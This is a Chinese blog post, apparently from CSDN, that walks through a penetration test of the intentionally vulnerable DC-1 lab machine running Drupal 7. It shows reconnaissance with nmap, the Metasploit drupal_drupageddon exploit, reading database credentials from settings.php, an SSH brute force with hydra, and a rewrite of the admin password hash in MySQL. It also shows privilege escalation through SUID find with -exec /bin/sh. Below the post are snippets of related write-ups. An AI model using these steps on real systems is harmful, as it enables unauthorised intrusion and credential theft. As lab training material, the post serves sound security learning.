渗透测试:DC-1靶机

最新推荐文章于 2024-06-09 23:38:41 发布
最新推荐文章于 2024-06-09 23:38:41 发布
阅读量316 收藏
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46706771/article/details/119464956
版权

一、扫描获取靶机ip

方法一

1.使用 ip add 查看kali ip

1.png 
192.168.203.130

2.用nmap扫描192.168.203.0/24以获取靶机ip

nmap -sP 192.168.203.0/24
2.png

得到ip

192.168.203.138

方法二

arp-scan -l
2.png

得到ip

192.168.203.138

二、获取网站信息

1.nmap

nmap -sV -A 192.168.203.138
4.png 5.png

可以看到,开放了三个端口22、80、111

其中80端口中存在robots.txt文件

7.png

在UPGRADE.txt文件中可以的设置本网站使用的是Drupal7

8.png

2.Wappaloyzer

6.png

用谷歌插件wappalyzer可以看到

这个网站的环境

CMS:Drupal 7

服务器:Apache

操作系统:Debian

JS库:jQuery 1.4.4

编译语言:PHP 5.4.45

三、getshell

1.flag1

使用msfconsole扫描网站目录

root@kali:~# msfconsole
msf5 > use auxiliary/scanner/http/dir_scanner
msf5 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.203.138	# 设置远程主机地址
msf5 auxiliary(scanner/http/dir_scanner) > set THREADS 20	# 设置并发线程数量
msf5 auxiliary(scanner/http/dir_scanner) > show options  #查看选项
msf5 auxiliary(scanner/http/dir_scanner) > run	# 开始扫描
9.png

使用msf搜索Drupal框架的漏洞

search drupal
10.png

可以查看到提供了8个可以使用的工具

我们可以依次尝试

use Name(工具的名字)
set RHOSTS 192.168.203.138
run

经过尝试后发现exploit/multi/http/drupal_drupageddon可以用

use exploit/multi/http/drupal_drupageddon
set RHOSTS 192.168.203.138
run
11.png

成功getshell后,ls查看文件,发现flag1.txt,cat flag1.txt

12.png

2.flag2

根据flag1的提示,我们可以查看CMS的配置文件

百度一下drupal的配置文件默认位置位于sites/default/settings.php

cd sites/default/
ls
cat settings.php
13.png 14.png

flag2提示字典爆破不是获取访问权限的唯一方法

15.png

同时也告诉了我们

数据库名是 drupaldb

账号是 dbuser

密码是 R0ck3t

3.flag3

由于知道了数据库账号密码,我们尝试登录

16.png

发现无此命令,输入shenll换壳

17.png

成功登录但是没有回显,我们另寻思路

linux下有两个专门存在的存放密码的路径,一个是/etc/passwd,一个是/etc/shadow

/etc/passwd是用户数据库,其中的域给出了用户名、加密口令和用户的其他信息. /etc/shadow是在安装了影子(shadow)口令软件的系统上的影子口令文件。影子口令文件将/etc/passwd 文件中的加密口令移动到/etc/shadow中,而后者只对超级用户root可读。这使破译口令更困难,以此增加系统的安全性。

由于没有root权限,先查看/etc/passwd文件

24.png

发现用户flag4,密码被加密,使用hydra暴破

hydra -l flag4 -P /root/john-1.8.0/run/password.lst ssh://192.168.203.138
26.png

得到flag4用户的密码为orange

通过ssh远程连接

ssh flag4@192.168.203.138
27.png

登录mysql

mysql -u dbuser -p
28.png 29.png

由于我们想要登录,所以需要看的是账号密码

select * from users;
30.png

可以看到admin的密码被SHA-512加密为

$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR

我们可以将数据库进行修改

把damin的值变成

$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4

PS:这个是password的SHA-512加密运算结果

update users SET pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4' where name='admin';
31.png

然后在登录直接登录,账号:admin 密码:password

32.png

在contenr发现flag3

33.png 34.png

4.flag4

根据flag3的提示,让我们查看shadow,但只有root权限才能读取、etc/shadow所以我们需要想办法获取root权限。

shell
pyrhon -c 'import pty;pty.spawn("/bin/sh")'
whoami

使用python反弹一个交互式shell

18.png

进行suid提权

SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。

查询find是否可以使用

find / -type f -perm -u=s 2>/dev/null
19.png

发现可以使用find,利用find进行提权

find / -type f -name getflag -exec "/bin/sh" \;
20.png

查找名为flag的文件

find / -name flag*
21.png

发现flag4.text

22.png

5.flag5

根据4的提示,我们访问root文件夹,发现thefinalflag.txt

23.png
C1yas0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnstack1--红队靶机(域渗透)
tlovejr的博客
04-27 4048
一、前言 这几天一直有点任务,就一直没来得更新,现在继续给大家更新一些贴近真实情况的靶场环境,今天的文章或许会有点长,因为有好多和我一样的小白,所以在这就多墨迹几句,有什么不对的还请大佬们给予批评指正 二、靶场前准备 首先做靶场前先需要做一些准备 1、下载靶场镜像文件 这步就没什么过多介绍的 链接:https://pan.baidu.com/s/1lElVlUfEovffRWWOCktdVQ?pwd=6666 提取码:6666 2、修改各个靶机登录密码 因为第一次登录不修改密码的话,第二次开机时,原
渗透测试DC-1
weixin_55638067的博客
11-30 322
目录 一、环境信息 二、信息收集 三、主动攻击 四、提权 一、环境信息 靶机IP:192.168.56.138 攻击机IP:192.168.56.133 二、信息收集 对靶机进行全端口扫描 nmap -sS -A -p- -n 192.168.56.138 先访问80端口 发现是一个drupal cms管理系统 接着使用dirb扫描网站目录 发现一个robots.txt文件,打开探测后并没有发现什么有用的东西 在网上查找到的durpal...
渗透测试学习之vulnhub系列靶机——DC1
最新发布
jingzhou_666的博客
06-09 1783
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,使用VMware即可直接运行。Drupal 是一个灵活的,基于 LAMP 技术栈的 CMS,它的模块化设计,允许通过安装和卸载模块的方式 添加和移除功能,同时,允许通过安装和卸载主题改变整个网站的视觉感观。在kali当中使用msf查看一下针对这个cms有哪些具体的模块可以使用使用模块弹出 meterpreter >代表利用成功可以继续进行后渗透3、漏洞利用。
Vulnhub之DC-1渗透测试
Bird&Bird
04-08 183
目录1、靶机概述2、信息收集3、获取shell4、提权 1、靶机概述 DESCRIPTION DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. It was designed to be a challenge for beginners, but just how easy it is will depend on your
DC-1靶机渗透测试
来日可期的博客
08-04 1860
SH文件大多是用于程序开发人员,这些文件都是Bash的应用程序非常重要,因为该应用程序主要使用脚本以及命令将被执行,使这个应用程序的工作。CMS:Drupal是开源CMS之一,Drupal是CMS内容管理系统,并且在世界各地使用,受到高度赞赏,Drupal可以作为开源软件免费使用,就是附带了cms的php开发框架。:/etc/passwd文件,系统用户配置文件,存储了系统中所有用户的基本信息,并且所有用户都可以对此文件执行读(r)操作。命令的选项之一,用于指定要搜索的文件名为 "flag4.txt"。
渗透靶机测试之DC:1
hclimg的博客
08-23 668
一、查看靶机要求: 需要通过这个靶机来获得五个标志,在root的主目标中查找和读取,那就是直接拿到这个靶机的权限就行了 二、进行主机发现 三、对主机进行详细扫描及浏览主页 在网上查找Drupal,发现这个cms存在漏洞,打开msf进行漏洞查找 三、利用该漏洞,拿到shell 拿到shell,但是此时的shell,并不是完全交互的tty,使用python转换获取完全交互的tty 四、...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
渗透测试DC-8靶机
Ciyaso的博客
08-23 598
一、扫描获取靶机ip arp-scan -l 192.168.203.147 二、获取网站信息 1.nmap 开放22、80端口 2.Wappaloyzer CMS:Drupal Web服务器:Apache 访问网站 3.sqlmap 点击Details下的选项发现url的nid=会发生变化, 在1后面加一个单引号,发现报错,说明存在sql注入 使用sqlmap sqlmap -u http://192.168.203.147/?nid=1 爆库 sqlmap -u http://192.
Hack The Box 系列域渗透之靶机Multimaster
二狗的博客
02-03 1364
本小白最近在学域渗透,决定把Hack The Box的Active Directory 101系列域渗透靶机打完,并详细记录当中用到的工具、知识点及其背后的原理。本篇文章是该系列的第九篇,靶机名字为Multimaster,这是一台疯狂难度的靶机
Hack The Box 系列域渗透之靶机Cascade
小王的储物间
02-03 503
本小白最近在学域渗透,决定把Hack The Box的Active Directory 101系列域渗透靶机打完,并详细记录当中用到的工具、知识点及其背后的原理。本篇文章是该系列的第八篇,靶机名字为Cascade。首先我们通过ldap进行信息搜集,发现了r.thompson用户的密码,通过访问r.thompson用户可以查看的SMB共享,我们获得了一封邮件以及用户s.smith用户的VNC密码(被加密了),后续我们通过Google找到了可以破解该密码的工具并成功得到。
Metasploit渗透测试(获取靶机控制权)
qq_51926773的博客
11-07 514
一,打开kali生成一个被控端: 输入命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=目标IP lport=5000 -f exe -o /root/payload.exe 这是你会发现你的kali会多出一个文件: 二,然后在kali输入msfconsole: 然后输入set payload windows/meterpreter/reverse_tcp,回车zai 再输入set lhost 靶机ip ...
内网域渗透总结(红日靶场一)
未完成的歌~的博客
04-11 6118
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
记一次域渗透靶场学习过程(全程干货)
MachineGunJoe666
05-25 1128
VulnStack7是红日安全团队最近的一个ATT&CK靶场,为一个三层靶场,靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 整体拓扑如下。 配置过程这里不再赘述,因为本人主机为linux主机,由于路径问题,导致dmz区域的机器无法正常运行,于是直接砍掉,反正网站为二层的docker环境内,不影响总体操作。且为了增加难度,在PC1和PC2安装了某安全软件,于是拓扑变成了下面这样: 记得开启相关服务,在各个机器上。..
红日域渗透靶场1实战复现
weixin_43410871的博客
06-24 1484
VulnStack 是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。
内网域渗透总结——红日靶场①_红日靶机账号密码(1),腾讯字节阿里小米京东大厂Offer拿到手软
m0_60635609的博客
04-06 979
发现目标存在yxcms,尝试访问#在首页发现了后台地址和管理员账密​。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C1yas0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值